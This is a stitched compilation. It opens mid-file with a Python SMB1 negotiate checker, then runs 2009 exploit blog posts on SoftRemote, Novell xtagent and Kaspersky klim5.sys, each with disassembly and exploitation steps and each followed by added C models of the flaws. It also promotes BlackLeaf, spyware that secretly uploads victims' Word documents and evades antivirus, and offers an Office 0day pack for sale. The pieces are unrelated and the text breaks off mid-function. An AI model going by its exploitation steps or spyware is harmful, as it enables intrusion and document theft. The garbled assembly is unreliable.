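def parse_smb1_header(pkt: bytes) -> Optional[Dict[str, int]]:
    """Return the SMB1 header fields, or None if this is not an SMB1 packet."""
    if len(pkt) < HDR_LEN or pkt[:4] != SMB1_MAGIC:
        return None
    # '<' = little-endian without padding: Command(B) Status(I) Flags(B) Flags2(H) PIDHigh(H)
    cmd, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", pkt, 4)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", pkt, 24)
    return {"command": cmd, "status": status, "flags": flags, "flags2": flags2,
            "pid_high": pid_high, "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid}


def parse_dialects(pkt: bytes) -> List[str]:
    """Dialect names from a NEGOTIATE body: WordCount, ByteCount, then 0x02 + NUL-terminated names."""
    if len(pkt) < HDR_LEN + 3:
        return []
    word_count = pkt[HDR_LEN]
    bc_off = HDR_LEN + 1 + 2 * word_count
    if len(pkt) < bc_off + 2:
        return []
    byte_count = struct.unpack_from("<H", pkt, bc_off)[0]
    data = pkt[bc_off + 2: bc_off + 2 + byte_count]
    return [entry.split(b"\x00", 1)[0].decode("ascii", "replace")
            for entry in data.split(b"\x02") if entry]


def inspect_negotiate(pkt: bytes) -> Tuple[str, List[str]]:
    """Classify one packet and list what a monitor should flag about it."""
    hdr = parse_smb1_header(pkt)
    if hdr is None:
        return "not-smb1", []
    if hdr["command"] != SMB_COM_NEGOTIATE:
        return "other", []
    alerts: List[str] = []
    if hdr["pid_high"] != 0:
        # Legitimate clients leave ProcessIdHigh at 0 in their negotiate.
        alerts.append(f"ProcessIdHigh = {hdr['pid_high']:#06x} in NEGOTIATE "
                      f"(dialects: {', '.join(parse_dialects(pkt))}); "
                      "srv2.sys used this value unchecked as a table index")
    return "negotiate", alerts


def build_negotiate(pid_high: int, dialects: List[str]) -> bytes:
    """Constructed SMB_COM_NEGOTIATE request, used only to exercise the checker."""
    hdr = SMB1_MAGIC + struct.pack("<BIBHH", SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, pid_high)
    hdr += b"\x00" * 8 + b"\x00\x00"                      # SecurityFeatures, Reserved
    hdr += struct.pack("<HHHH", 0xFFFF, 0xFEFF, 0, 0)     # TID, PIDLow, UID, MID
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    return hdr + b"\x00" + struct.pack("<H", len(data)) + data   # WordCount=0, ByteCount


if __name__ == "__main__":
    legit = build_negotiate(0, ["NT LM 0.12", "SMB 2.002"])
    odd = build_negotiate(0x1234, ["NT LM 0.12", "SMB 2.002"])   # constructed value
    print(inspect_negotiate(legit))   # ('negotiate', [])
    print(inspect_negotiate(odd))
```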
Safenet is not so safe...
(Tuesday, 02 June 2009) Written by Rubén
Hi! Time for VPN clients... Reversemode proudly presents "Safenet SoftRemote IKE ireIke.exe service Remote Stack Overflow (Pre-Auth)". ZDI Advisory

Safenet SoftRemote Overview
http://www.safenet-inc.com/softremote/
SoftRemote is an award-winning VPN client platform for desktop and mobile devices that delivers robust security, ease of use, and powerful policy management features. With an installed base of millions of users, SoftRemote has become the de-facto standard for VPN client software worldwide. Leading VPN vendors use the SoftRemote's OEM version within their custom solutions. Some of these products are:
● Juniper NetScreen Remote
● NetGear Prosafe VPN client
● WatchGuard Mobile User VPN Client
Thus, the vulnerability affects every "SoftRemote powered" product.

Preface
In this document we use Juniper NetScreen Remote as "scapegoat" to demonstrate the vulnerability, since it is bundled with the vulnerable version of Safenet's SoftRemote OEM version. This does not mean that Juniper NetScreen Remote is the only product affected. As explained before, every product powered by Safenet's SoftRemote is vulnerable.

Technical Details
The ireIke.exe service is prone to a remote stack overflow. Malicious attackers can anonymously exploit this flaw by sending a specially crafted UDP packet to port 62514. Successful exploitation grants SYSTEM privileges to the attacker. The ireIke.exe service binds several ports for internal usage; this process can be traced by debugging the following function:

Module: ireIke.exe
.text:0043C8E0 sub_43C8E0 proc near ; CODE XREF: sub_41A8B0+295#p
.text:0043C8E0 ; sub_437F00+442#p ...
.text:0043C8E0
.text:0043C8E0 WSAData = WSAData ptr -190h
.text:0043C8E0 arg_0 = dword ptr 4
[...]
.text:0043CAF4 loc_43CAF4: ; CODE XREF: sub_43C8E0+1ED#j
.text:0043CAF4 ; sub_43C8E0+208#j
.text:0043CAF4 mov eax, dword_46F2BC
.text:0043CAF9 push eax ; int
.text:0043CAFA push 0F432h ; 62514 - IPC socket
.text:0043CAFF push 11h ; int
.text:0043CB01 push 2 ; af
.text:0043CB03 call sub_43B850 ; binds
.text:0043CB08 add esp, 10h
.text:0043CB0B cmp eax, edi
.text:0043CB0D mov dword_46F280, eax
.text:0043CB12 jnz short loc_43CB34
.text:0043CB14 test byte_45ED58, bl
.text:0043CB1A jz short loc_43CB34
.text:0043CB1C push offset SourceName ; "IreIKE"
.text:0043CB21 push offset aSUnableToBin_1 ; "%s: Unable to bind IPC socket!"
.text:0043CB26 mov dword_479FF8, ebx
.text:0043CB2C call sub_437020
.text:0043CB31 add esp, 8

After receiving the packet, ireIKE.exe uses the fifth byte as a "command":

.text:00449E19 movsx eax, byte ptr [ebx+4] ; fifth byte
.text:00449E1D add eax, 0FFFFFFD8h ; command - 0x28
.text:00449E20 mov [esp+3F4h+var_3DC], ebp
.text:00449E24 cmp eax, 19h ; switch 26 cases 'commands'
.text:00449E27 ja loc_44AB78 ; default
.text:00449E27 ; jumptable 00449E35 cases 7,9,10,14,16-18,20-24
.text:00449E2D xor edx, edx
.text:00449E2F mov dl, ds:byte_44ABE4[eax]
.text:00449E35 jmp ds:off_44ABA8[edx*4] ; switch jump

The first DWORD needs to be 1 for an internal IPC packet. We can trigger the flaw by invoking command 0x19 => *(payload+4) = 0x41. Other commands are also vulnerable since they rely on the common error logging routine when the operation fails. Any data associated with the command starts at (payload+9).

.text:0044A9B3 loc_44A9B3: ; CODE XREF: sub_449DA0+95#j
.text:0044A9B3 ; DATA XREF: .text:off_44ABA8#o
.text:0044A9B3 lea ebp, [ebx+9] ; jumptable 00449E35 case 25
.text:0044A9B6 or ecx, 0FFFFFFFFh
.text:0044A9B9 mov edi, ebp
.text:0044A9BB xor eax, eax

IreIKE.exe parses our buffer looking for a valid connection name; if there is none it invokes a common error routine where the stack overflow occurs.
    .text:0044AA2C push ebp ; char
    .text:0044AA2D push offset aSUnrecognizedC ; "%s - unrecognized connection name."
    .text:0044AA32 mov dword_479FF8, 20h
    .text:0044AA3C call sub_437020
    .text:0044AA41 add esp, 8
    .text:0044AA44
    .text:0044AA44 loc_44AA44: ; CODE XREF: sub_449DA0+C8A#j
    .text:0044AA44 push 0 ; int
    .text:0044AA46 push 0 ; int
    .text:0044AA48 push 0 ; int
    .text:0044AA4A push ebp ; char *
    .text:0044AA4B push 80h ; char
    .text:0044AA50 call sub_44AD00 ; Common error routine

Inside the common error routine:

    ; int __cdecl sub_44AD00(char,char *,int,int,int)
    sub_44AD00 proc near
    var_2F8= dword ptr -2F8h
    to= sockaddr ptr -2F4h
    buf= byte ptr -2E4h
    var_2E0= byte ptr -2E0h
    var_2D9= dword ptr -2D9h
    var_2D5= dword ptr -2D5h
    var_2D1= byte ptr -2D1h
    var_D4= dword ptr -0D4h ; Attention!
    arg_0= byte ptr 4
    arg_4= dword ptr 8
    arg_8= dword ptr 0Ch
    arg_C= dword ptr 10h
    arg_10= dword ptr 14h
    sub esp, 2F8h
    push ebx
    [...]
    .text:0044AD9F lea edx, [esp+314h+var_D4]
    .text:0044ADA6 push edi ; char * (source string)
    .text:0044ADA7 push edx ; int (destination: var_D4 on the stack)
    .text:0044ADA8 mov [esp+31Ch+buf+3], 1
    .text:0044ADAD mov [esp+31Ch+buf+2], bl
    .text:0044ADB1 mov [esp+31Ch+buf+1], bl
    .text:0044ADB5 mov [esp+31Ch+buf], bl
    .text:0044ADB9 mov [esp+31Ch+var_2E0], 2Fh
    .text:0044ADBE mov [esp+31Ch+var_2D9], esi
    .text:0044ADC2 call sub_40F890

    .text:0040F890 ; int __cdecl sub_40F890(int,char *,int,int)
    .text:0040F890 sub_40F890 proc near ; CODE XREF: sub_408D30+17B#p
    .text:0040F890 ; sub_410850+108#p ...
    .text:0040F890
    .text:0040F890 var_28 = byte ptr -28h
    .text:0040F890 arg_0 = dword ptr 4
    .text:0040F890 arg_4 = dword ptr 8
    .text:0040F890 arg_8 = dword ptr 0Ch
    .text:0040F890 arg_C = dword ptr 10h
    .text:0040F890
    .text:0040F890 mov edx, [esp+arg_4]
    .text:0040F894 sub esp, 28h
    .text:0040F897 or ecx, 0FFFFFFFFh
    .text:0040F89A xor eax, eax
    .text:0040F89C push ebx
    .text:0040F89D push ebp
    .text:0040F89E push esi
    .text:0040F89F push edi
    .text:0040F8A0 mov edi, edx
    .text:0040F8A2 mov ebp, [esp+38h+arg_0]
    .text:0040F8A6 repne scasb ; strlen(src) + 1
    .text:0040F8A8 not ecx
    .text:0040F8AA sub edi, ecx
    .text:0040F8AC push 5Ch ; int
    .text:0040F8AE mov eax, ecx
    .text:0040F8B0 mov esi, edi ; src
    .text:0040F8B2 mov edi, ebp ; dst = var_D4
    .text:0040F8B4 push edx ; char *
    .text:0040F8B5 shr ecx, 2
    .text:0040F8B8 rep movsd ; FLAW
    .text:0040F8BA mov ecx, eax
    .text:0040F8BC and ecx, 3
    .text:0040F8BF rep movsb

In other words, sub_40F890 is an inlined strcpy: the copy length is taken from the source string (which embeds our connection name) and is never compared against the destination, var_D4, which sits 0xD4 bytes below the saved return address in sub_44AD00's frame. Once the program returns from sub_44AD00 the overwritten return address is used and the flaw is triggered.

That's all! See you in the next advisory :)
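The packet layout and the copy walked through above, as an added example that is not part of the advisory or of SafeNet's code. It models the dispatcher in C from the constants in the listings (first dword 1, command byte at offset 4 minus 0x28, 26 cases, command data at offset 9, a 0xD4-byte destination in sub_44AD00's frame) and puts the unbounded copy beside a bounded one. The 64-byte name limit, the datagram builder and the scratch message buffer are assumptions of the example, not behaviour of ireIke.exe.

```c
/* Model of the ireIke.exe IPC datagram handling (added example, not the
 * advisory's or SafeNet's code). Constants come from the listings; MAX_NAME,
 * build_packet() and the scratch buffer in handle_vulnerable() are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPC_MAGIC     1u
#define CMD_BASE      0x28
#define CMD_COUNT     26        /* cmp eax, 19h ; ja default */
#define CMD_CONN_NAME 0x19      /* case 25, selected by the byte 0x41 */
#define DATA_OFFSET   9         /* lea ebp, [ebx+9] */
#define ERRBUF_SIZE   0xD4      /* var_D4 in sub_44AD00 */
#define MAX_NAME      64        /* assumption for the hardened handler */

enum verdict { V_DROPPED = 0, V_HANDLED = 1, V_OVERFLOW = 2 };

/* strnlen() without relying on the POSIX declaration. */
static size_t bounded_len(const char *s, size_t max)
{
    const char *nul = memchr(s, 0, max);
    return nul ? (size_t)(nul - s) : max;
}

/* The dispatcher at 0x449E19: command index, or -1 for the default case. */
static int ipc_command(const uint8_t *pkt, size_t len)
{
    uint32_t magic;
    if (len < DATA_OFFSET)
        return -1;
    memcpy(&magic, pkt, sizeof magic);          /* little-endian host assumed */
    if (magic != IPC_MAGIC)
        return -1;
    int cmd = (int8_t)pkt[4] - CMD_BASE;        /* movsx eax, [ebx+4] ; add eax, -28h */
    return (cmd < 0 || cmd >= CMD_COUNT) ? -1 : cmd;   /* ja is an unsigned compare */
}

/* Vulnerable path: the name is a C string bounded only by its NUL, and the
 * message built from it is copied into the 0xD4-byte stack buffer with
 * strlen() as the length (repne scasb ; rep movsd ; rep movsb). Instead of
 * smashing the stack, report whether the copy would run past the buffer. */
static enum verdict handle_vulnerable(const uint8_t *pkt, size_t len)
{
    char msg[1024];
    if (ipc_command(pkt, len) != CMD_CONN_NAME)
        return V_DROPPED;
    const char *name = (const char *)pkt + DATA_OFFSET;
    size_t nlen = bounded_len(name, len - DATA_OFFSET);
    if (nlen == len - DATA_OFFSET)
        return V_OVERFLOW;                       /* strlen() would run off the datagram */
    snprintf(msg, sizeof msg, "%s - unrecognized connection name.", name);
    return (strlen(msg) + 1 > ERRBUF_SIZE) ? V_OVERFLOW : V_HANDLED;
}

/* Hardened path: bound the name by the datagram, cap its length, and format
 * straight into the destination with its real size. */
static enum verdict handle_hardened(const uint8_t *pkt, size_t len)
{
    char errbuf[ERRBUF_SIZE];
    if (ipc_command(pkt, len) != CMD_CONN_NAME)
        return V_DROPPED;
    const char *name = (const char *)pkt + DATA_OFFSET;
    size_t nlen = bounded_len(name, len - DATA_OFFSET);
    if (nlen == len - DATA_OFFSET || nlen > MAX_NAME)
        return V_DROPPED;                        /* unterminated or too long */
    int n = snprintf(errbuf, sizeof errbuf, "%.*s - unrecognized connection name.",
                     (int)nlen, name);
    return (n < 0 || (size_t)n >= sizeof errbuf) ? V_DROPPED : V_HANDLED;
}

/* Datagram layout: dword 1, command byte, 4 bytes of padding, name + NUL.
 * Returns the length written, or 0 if it does not fit. */
static size_t build_packet(uint8_t *out, size_t cap, uint8_t cmd_byte, const char *name)
{
    size_t nlen = strlen(name) + 1;
    if (cap < DATA_OFFSET + nlen)
        return 0;
    memset(out, 0, DATA_OFFSET);
    out[0] = IPC_MAGIC;
    out[4] = cmd_byte;
    memcpy(out + DATA_OFFSET, name, nlen);
    return DATA_OFFSET + nlen;
}

/* Constructed input: a name of name_len 'A's sent with cmd_byte. */
static enum verdict run_case(uint8_t cmd_byte, size_t name_len, int hardened)
{
    uint8_t pkt[1024];
    char name[512];
    if (name_len >= sizeof name)
        return V_DROPPED;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    size_t n = build_packet(pkt, sizeof pkt, cmd_byte, name);
    return hardened ? handle_hardened(pkt, n) : handle_vulnerable(pkt, n);
}

int main(void)
{
    printf("299-byte name: vulnerable=%d hardened=%d\n", run_case(0x41, 299, 0), run_case(0x41, 299, 1));
    printf("10-byte name:  vulnerable=%d hardened=%d\n", run_case(0x41, 10, 0), run_case(0x41, 10, 1));
    return 0;
}
```

On the vulnerable path a 179-byte name exactly fills the 0xD4 bytes and a 180-byte name is the first whose copy reaches the saved return address; the hardened handler never gets that far because it refuses anything past MAX_NAME and formats with the buffer's real size.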
Exploiting Novell/Netidentity Agent Remote Arbitrary Pointer Dereference.
(Thursday, 09 April 2009) Written by Rubén
Hi there,

After months of inactivity I'm back with a hot exploit for a recently released flaw I discovered some time ago. Extracted from the ZDI advisory:

Vulnerability Details
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netware. A valid IPC$ connection must be established in order to exploit this vulnerability. The specific flaw exists within xtagent.exe during the handling of RPC messages over the XTIERRPCPIPE named pipe. Insufficient sanity checking allows remote attackers to dereference an arbitrary pointer which can be leveraged to execute code under the context of the system user.

Technically, xtagent.exe creates a named pipe which is used as an RPC endpoint (its own RPC implementation, though):

Module: xtagent.exe (4.91 SP4)

    .text:0040129C lea ecx, [ebp+SecurityAttributes]
    .text:0040129F push ecx ; lpSecurityAttributes
    .text:004012A0 push 4E20h ; nDefaultTimeOut
    .text:004012A5 push 800h ; nInBufferSize
    .text:004012AA push 800h ; nOutBufferSize
    .text:004012AF push 0FFh ; nMaxInstances
    .text:004012B4 push 4 ; dwPipeMode
    .text:004012B6 push 3 ; dwOpenMode
    .text:004012B8 push offset Name ; "\\\\.\\PIPE\\XTIERRPCPIPE"
    .text:004012BD call ds:CreateNamedPipe

This pipe can be accessed only if a valid IPC$ session can be established. No valid credentials are needed, so you can also use a NULL session. The pipe waits for remote commands, which are referenced by the first dword within the received buffer.
Module: xtagent.exe

    .text:004013A2 push eax ; lpOverlapped
    .text:004013A3 lea edx, [ebp+NumberOfBytesRead]
    .text:004013A6 push edx ; lpNumberOfBytesRead
    .text:004013A7 push 800h ; nNumberOfBytesToRead
    .text:004013AC push ebx ; lpBuffer
    .text:004013AD push esi ; hFile
    .text:004013AE call ds:ReadFile
    .text:004013B4 test eax, eax
    .text:004013B6 jz loc_401542
    .text:004013BC mov edi, 18h
    .text:004013C1 cmp [ebp+NumberOfBytesRead], edi
    .text:004013C4 jb loc_401557
    .text:004013CA mov eax, [ebx] ; ebx = user-controlled buffer
    .text:004013CC dec eax
    .text:004013CD cmp eax, 4 ; 5 RPC functions
    .text:004013D0 ja loc_401508 ; default
    .text:004013D6 jmp ds:off_4015E0[eax*4] ; switch jump

The buffer where ReadFile copies the received bytes is allocated in the heap just once per session, and then zeroed on each request.

Module: xtagent.exe

    mov eax, dword_40D55C
    mov ecx, [eax]
    push 800h ; buffsize
    push eax
    call dword ptr [ecx+68h] ; allocate buffer
    mov ebx, eax
    [...]
    .text:00401397 mov ecx, 200h
    .text:0040139C xor eax, eax
    .text:0040139E mov edi, ebx
    .text:004013A0 rep stosd ; memset(buffer,0,buffsize)

There are 5 functions we can reach through this named pipe. The flaw is that we can make the agent dereference an arbitrary pointer to a VTABLE, thus controlling a call to an arbitrary address.
Module: xtagent.exe

    .text:004015DD align 10h
    .text:004015E0 off_4015E0 dd offset loc_4013DD
    .text:004015E0 dd offset loc_401466 ; arbitrary pointer dereference #1
    .text:004015E0 dd offset loc_4014C0 ; arbitrary pointer dereference #2
    .text:004015E0 dd offset loc_401512 ; heap memory leak #1
    .text:004015E0 dd offset loc_401512 ; heap memory leak #2
    .text:004015F4 align 10h

So:

Module: xtagent.exe

    .text:00401466 mov eax, [ebx+8] ; eax controlled (a dword from the sent buffer)
    .text:00401469 mov [ebp+var_4], 0
    .text:00401470 mov edx, [eax] ; edx controlled once eax points into our data
    .text:00401472 push eax
    .text:00401473 call dword ptr [edx+8] ; controlled

We can control all the relevant registers; however, we cannot exploit this issue reliably without knowing where ReadFile has placed our controlled buffer. Fortunately there are two functions which call WriteFile with a user-controlled size,

so we can leak bytes from the heap that lies beyond our buffer and, based on the next chunk's metadata, calculate where our buffer is located.

Module: xtagent.exe

    .text:00401512 push 0 ; jumptable 004013D6 cases 3,4
    .text:00401514 lea edx, [ebp+NumberOfBytesWritten]
    .text:00401517 push edx ; lpNumberOfBytesWritten
    .text:00401518 mov eax, [ebx+4] ; controlled
    .text:0040151B push eax ; nNumberOfBytesToWrite
    .text:0040151C push ebx ; lpBuffer
    .text:0040151D push esi ; hFile
    .text:0040151E call ds:WriteFile

That's all. You can grab more details by reading the exploit code.

Novell/NetIdentity Agent Remote Arbitrary Pointer Dereference
Download exploit code.

happy hunting!
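The dispatcher, the pointer dereference in functions 2 and 3 and the over-read in functions 4 and 5, as an added example in C that is not Novell's code. The 0x800 buffer, the 0x18 minimum message length, the "first dword selects one of five functions" switch and the two attacker-controlled fields (the dword at +4 fed to WriteFile as a size, the dword at +8 used as an object pointer) come from the listings; the server-side handle table, the result codes and the way the leak is counted are assumptions of the example.

```c
/* Model of the xtagent.exe XTIERRPCPIPE dispatcher (added example, not
 * Novell's code). Field offsets and sizes come from the listings; the handle
 * table, result codes and leak accounting are assumptions. */
#include <stdint.h>
#include <string.h>

#define PIPE_BUF  0x800     /* nInBufferSize and the per-session heap buffer */
#define MIN_MSG   0x18      /* cmp [NumberOfBytesRead], 18h ; jb */
#define NUM_FUNCS 5         /* dec eax ; cmp eax, 4 ; ja default */

enum result { R_OK = 0, R_SHORT_MSG, R_BAD_FUNC, R_BAD_HANDLE, R_RAW_POINTER_CALL, R_BAD_LEN };

struct object;
struct vtable { int (*method)(struct object *); };   /* the slot reached by call [edx+8] */
struct object { const struct vtable *vt; int id; };

static int describe(struct object *o) { return o->id; }
static const struct vtable object_vtable = { describe };
/* Server-side objects; a safe protocol hands out indices into this table,
 * never the pointers themselves. */
static struct object handles[] = { { &object_vtable, 100 }, { &object_vtable, 101 } };

static uint32_t g_leaked;   /* bytes WriteFile would send from past the 0x800 buffer */

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void put32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* buf is the 0x800-byte request buffer, received the count ReadFile returned. */
static enum result dispatch(const uint8_t *buf, uint32_t received, int hardened)
{
    g_leaked = 0;
    if (received < MIN_MSG)
        return R_SHORT_MSG;
    uint32_t func = le32(buf);                     /* mov eax, [ebx] */
    if (func == 0 || func > NUM_FUNCS)
        return R_BAD_FUNC;
    uint32_t size = le32(buf + 4);                 /* [ebx+4]: nNumberOfBytesToWrite */
    uint32_t obj  = le32(buf + 8);                 /* [ebx+8]: used as an object pointer */
    switch (func) {
    case 2: case 3:
        if (!hardened)
            return R_RAW_POINTER_CALL;             /* mov edx,[eax] ; call [edx+8], eax = obj */
        if (obj >= sizeof handles / sizeof handles[0])
            return R_BAD_HANDLE;                   /* index must name a server-side object */
        return handles[obj].vt->method(&handles[obj]) > 0 ? R_OK : R_BAD_HANDLE;
    case 4: case 5:
        if (hardened && size > received)
            return R_BAD_LEN;                      /* the check the binary lacks */
        if (size > PIPE_BUF)
            g_leaked = size - PIPE_BUF;            /* the adjacent heap chunk goes out the pipe */
        return R_OK;
    default:
        return R_OK;                               /* function 1 is not relevant here */
    }
}

/* Constructed request: func, size and obj in the first three dwords, the rest
 * zero, delivered as `received` bytes. */
static enum result send_msg(uint32_t func, uint32_t size, uint32_t obj, uint32_t received, int hardened)
{
    uint8_t buf[PIPE_BUF] = { 0 };                 /* zeroed per request, like the rep stosd */
    if (received > PIPE_BUF)
        received = PIPE_BUF;
    put32(buf, func);
    put32(buf + 4, size);
    put32(buf + 8, obj);
    return dispatch(buf, received, hardened);
}

static uint32_t leaked_bytes(void) { return g_leaked; }
```

With the unchecked size, a function-4 request asking for 0x1000 bytes ships 0x800 bytes of whatever follows the request buffer on the heap, which is exactly what the exploit uses to find its own buffer; the hardened dispatcher caps the reply at what was received and turns the "object pointer" into an index into memory the server owns.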
BlackLeaf released
(Friday, 30 January 2009) Written by Rubén
BlackLeaf is a software intended for pentesting and/or monitoring, not for any illegal purpose. BlackLeaf comprises several components. The user-mode DLL component is the only one that has to be present on the target's machine. To achieve this goal, the DLL can be installed by any means, including:

- Manual modification of the registry and hard disk (requires physical access)
- Remote installation by using a specially developed program that silently drops and runs all the required components (this program is included)

We can see in the picture above that, once the BlackLeaf client (a single DLL) has been installed on the target's machine, it sends, in real time, every document opened in Microsoft Word to a remote server. BlackLeaf supports HTTPS for sending the documents; using this option is highly recommended. A valid certificate is not needed at all.

BlackLeaf demo from Ruben on Vimeo.
Download high-resolution demo video (62 MB)
Download whitepaper

Features:
- Point-and-click configuration.
- Works on Microsoft Word XP, 2003 and 2007.
- Works on Windows 2000, XP, 2003, 2008, Vista and Windows 7.
- You just need a web hosting where the files will be uploaded.
- Bypasses Word's password protection. You receive the document unprotected.
- Bypasses Kaspersky IS 2009, Symantec Norton 360 2.0 and McAfee IS 2009 among others...
- Files are identified by a customizable identification number to distinguish their source.
- Obtains the exact location from where the document was opened.
- Requires admin privileges.

More information: http://blackleaf.reversemode.com
Exploiting kaspersky klim5.sys driver + Happy pack #2
(Wednesday, 21 January 2009) Written by Rubén
Interested in happy pack #2? This time it is focused on the Microsoft Office suite:

- Fingerprinting remote machines
- Dynamic content generation in documents for use in targeted attacks
- 0day

Do not hesitate to contact me if you are interested. For legal companies and institutions ONLY. Please, no vuln-info see-u-ckers. No gangs.

Let's talk about an interesting flaw I found months ago in Kaspersky's NDIS engine. This driver is in charge of intercepting packets as they arrive or are sent. (Un)fortunately a simple user-mode program can modify some callbacks in klim5.sys to point to a user-mode controlled address, just by sending a specially crafted IOCTL request. So... we face a local privilege escalation. Again.

    .text:00011774 cmp ecx, 80052110h ; IOCTL
    .text:0001177A jnz short loc_117E9
    .text:0001177C cmp ebp, 10h ; input length
    .text:0001177F jnb short loc_1178E ; FLAW: the only check on the request
    .text:00011781 push 10h
    .text:00011783 mov [esp+14h+Irp], 0C0000023h ; STATUS_BUFFER_TOO_SMALL
    .text:0001178B pop ebx
    .text:0001178C jmp short loc_117E9
    .text:0001178E ; ---------------------------------------------------------------------------
    .text:0001178E
    .text:0001178E loc_1178E: ; CODE XREF: sub_11730+4Fj
    .text:0001178E push offset SpinLock ; SpinLock
    .text:00011793 push offset dword_140A8 ; int
    .text:00011798 push edi ; int
    .text:00011799 call sub_11604 ; Flaw
    .text:0001179E add edi, 8
    .text:000117A1 push offset dword_140B8 ; SpinLock
    .text:000117A6 or eax, 0FFFFFFFFh
    .text:000117A9 sub eax, [edi]
    .text:000117AB push offset dword_140B0 ; int
    .text:000117B0 push edi ; int
    .text:000117B1 mov [edi], eax
    .text:000117B3 call sub_11604

and finally

    .text:000115CB push [ebp+arg_0]
    .text:000115CE call dword ptr [edi+8] ; Controlled

What is interesting about this flaw is the way of exploiting it. NDIS calls are "context-free" by definition, so when a packet arrives or is sent the NDIS call can be invoked in an arbitrary thread context. Therefore, the callback we are modifying could be invoked in any thread other than ours.
There is an intrinsic race condition in the exploit. Let's imagine a scenario where the exploit modifies the callback to point to the address of its shellcode at 0x401000. Before the callback reaches our code in the exploit's context, another thread may trigger the callback, and in that process's address space 0x401000 can contain anything. Note also that the memory referenced must be paged in, since the callback is dispatched at DISPATCH_LEVEL. To solve this we follow the steps below:

- Boost the priority of our exploit process/thread.
- Find bytes in ring3 that every process maps at the same address and point the callback there: in the exploit's own context we modify that location so it leads to our shellcode, whilst in any other process the same address still holds a "ret 4" instruction (NtDeleteKey+n).
- The shellcode must then set the callbacks to a "ret 4" address that can be accessed from ring0 (ExGetSharedWaitersCount+n). In this way the system keeps stable.

Let's see.

(Screenshots: while running the exploit / after running the exploit.)

I notified Kaspersky about this flaw several months ago. This flaw is fixed in the latest KIS 2009 and, according to them, it was fixed in KAV for Workstation yesterday; I cannot confirm it.

You can download the k-plugin for Kartoffel here.
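The IOCTL handler from the listing, as an added example in C that is not Kaspersky's code: the only validation the binary performs is the 0x10-byte minimum input length before two dwords from the user buffer are stored in the globals that later feed "call dword ptr [edi+8]". The example puts that handler beside one in which user mode can only choose among callbacks the driver already owns, and adds the call-site check the NDIS path lacks. The user/kernel split at 0x80000000, the driver image range and the callback table are assumptions of the example; the race condition discussed above is outside what a user-mode model can show.

```c
/* Model of the klim5.sys IOCTL 0x80052110 handler (added example, not
 * Kaspersky's code). Only MIN_INPUT and the IOCTL code come from the listing;
 * USER_SPACE_LIMIT, the image range and driver_callbacks[] are assumptions. */
#include <stdint.h>
#include <string.h>

#define IOCTL_SET_CALLBACKS 0x80052110u
#define MIN_INPUT           0x10
#define USER_SPACE_LIMIT    0x80000000u   /* MmUserProbeAddress, default 32-bit layout */
#define DRIVER_IMAGE_START  0xF7A10000u   /* hypothetical klim5.sys load range */
#define DRIVER_IMAGE_END    0xF7A20000u

typedef uint32_t ntstatus;
#define S_OK                 0x00000000u
#define S_INVALID_PARAMETER  0xC000000Du
#define S_BUFFER_TOO_SMALL   0xC0000023u  /* what the listing returns for short input */
#define S_INVALID_DEVICE_REQ 0xC0000010u

struct callbacks { uint32_t on_receive; uint32_t on_send; };   /* dword_140A8 / dword_140B0 */

/* Callbacks the driver legitimately owns (hypothetical offsets in its image). */
static const uint32_t driver_callbacks[] = {
    DRIVER_IMAGE_START + 0x0604,
    DRIVER_IMAGE_START + 0x05CB,
    DRIVER_IMAGE_START + 0x0740,
};
#define NUM_DRIVER_CALLBACKS (sizeof driver_callbacks / sizeof driver_callbacks[0])

static struct callbacks g_cb = { DRIVER_IMAGE_START + 0x0604, DRIVER_IMAGE_START + 0x05CB };

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* As the listing shows it: a length check, then two dwords from the caller
 * become the function pointers. (The binary complements the second dword
 * before storing it, which changes nothing about the problem.) */
static ntstatus ioctl_vulnerable(uint32_t code, const uint8_t *in, uint32_t in_len)
{
    if (code != IOCTL_SET_CALLBACKS) return S_INVALID_DEVICE_REQ;
    if (in_len < MIN_INPUT) return S_BUFFER_TOO_SMALL;   /* cmp ebp, 10h ; jnb */
    g_cb.on_receive = le32(in);                          /* sub_11604(edi, &dword_140A8, ...) */
    g_cb.on_send    = le32(in + 8);                      /* sub_11604(edi + 8, &dword_140B0, ...) */
    return S_OK;
}

/* Hardened: the request carries indices into the driver's own table, so no
 * caller-supplied address, user or kernel, can ever become a code pointer. */
static ntstatus ioctl_hardened(uint32_t code, const uint8_t *in, uint32_t in_len)
{
    if (code != IOCTL_SET_CALLBACKS) return S_INVALID_DEVICE_REQ;
    if (in_len < MIN_INPUT) return S_BUFFER_TOO_SMALL;
    uint32_t r = le32(in), s = le32(in + 8);
    if (r >= NUM_DRIVER_CALLBACKS || s >= NUM_DRIVER_CALLBACKS) return S_INVALID_PARAMETER;
    g_cb.on_receive = driver_callbacks[r];
    g_cb.on_send    = driver_callbacks[s];
    return S_OK;
}

/* Defence in depth at the call site: refuse to dispatch through anything
 * outside the driver image. The NDIS path in the listing calls unconditionally. */
static int callback_is_sane(uint32_t addr)
{
    return addr >= USER_SPACE_LIMIT && addr >= DRIVER_IMAGE_START && addr < DRIVER_IMAGE_END;
}

static int on_packet_received(void)   /* 1 = would dispatch, 0 = refused */
{
    return callback_is_sane(g_cb.on_receive);
}

static uint32_t current_receive_callback(void) { return g_cb.on_receive; }

/* Constructed request: the two dwords at +0 and +8 of a 16-byte buffer,
 * delivered with the given input length. */
static ntstatus send_ioctl(uint32_t first, uint32_t second, uint32_t in_len, int hardened)
{
    uint8_t req[MIN_INPUT] = { 0 };
    for (int i = 0; i < 4; i++) {
        req[i]     = (uint8_t)(first >> (8 * i));
        req[8 + i] = (uint8_t)(second >> (8 * i));
    }
    if (in_len > MIN_INPUT)
        in_len = MIN_INPUT;
    return hardened ? ioctl_hardened(IOCTL_SET_CALLBACKS, req, in_len)
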